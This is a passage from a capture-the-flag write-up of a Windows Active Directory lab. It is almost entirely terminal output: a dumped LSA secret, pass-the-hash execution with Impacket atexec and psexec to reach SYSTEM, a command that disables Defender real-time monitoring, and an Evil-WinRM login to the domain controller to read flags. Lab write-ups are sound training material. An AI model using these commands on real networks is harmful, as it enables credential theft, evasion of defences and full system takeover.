 0020   10 1F 8F 40 B4 EB 04 6F  42 8F 37 02 7E E5 85 93   ...@...oB.7.~...
 0030   00 9C 28 46 DE 39 3F BB  78 90 E7 C8 AB 3A 75 D1   ..(F.9?.x....:u.
NL$KM:deaaf45081297c820d6ff22d088ba27a7d469f66c38fd49afadbd29d569a7928101f8f40b4eb046f428f37027ee58593009c2846de393fbb7890e7c8ab3a75d1
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

---

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "whoami"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \yVNLerVO
[*] Running task \yVNLerVO
[*] Deleting task \yVNLerVO
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
nt authority\system

---

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \AvHKoFmN
[*] Running task \AvHKoFmN
[*] Deleting task \AvHKoFmN
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp

---

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-psexec administrator@WS01.reflection.vl -hashes ':a2<redacted>02' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on WS01.reflection.vl.....
[*] Found writable share ADMIN$
[*] Uploading file YQydtkPz.exe
[*] Opening SVCManager on WS01.reflection.vl.....
[*] Creating service dvqZ on WS01.reflection.vl.....
[*] Starting service dvqZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>    

--
c:\Users\Rhys.Garner\Desktop> type flag.txt
VL{ba<redacted>eb}

---

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ evil-winrm --ip dc01.reflection.vl -u 'dom_rgarner' -p 'kn<redacted>uP'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\dom_rgarner\Documents> dir
*Evil-WinRM* PS C:\Users\administrator\desktop> dir


    Directory: C:\Users\administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/8/2023   4:24 AM             36 flag.txt


*Evil-WinRM* PS C:\Users\administrator\desktop> type flag.txt
VL{05<redacted>17}
*Evil-WinRM* PS C:\Users\administrator\desktop> 

That’s all.
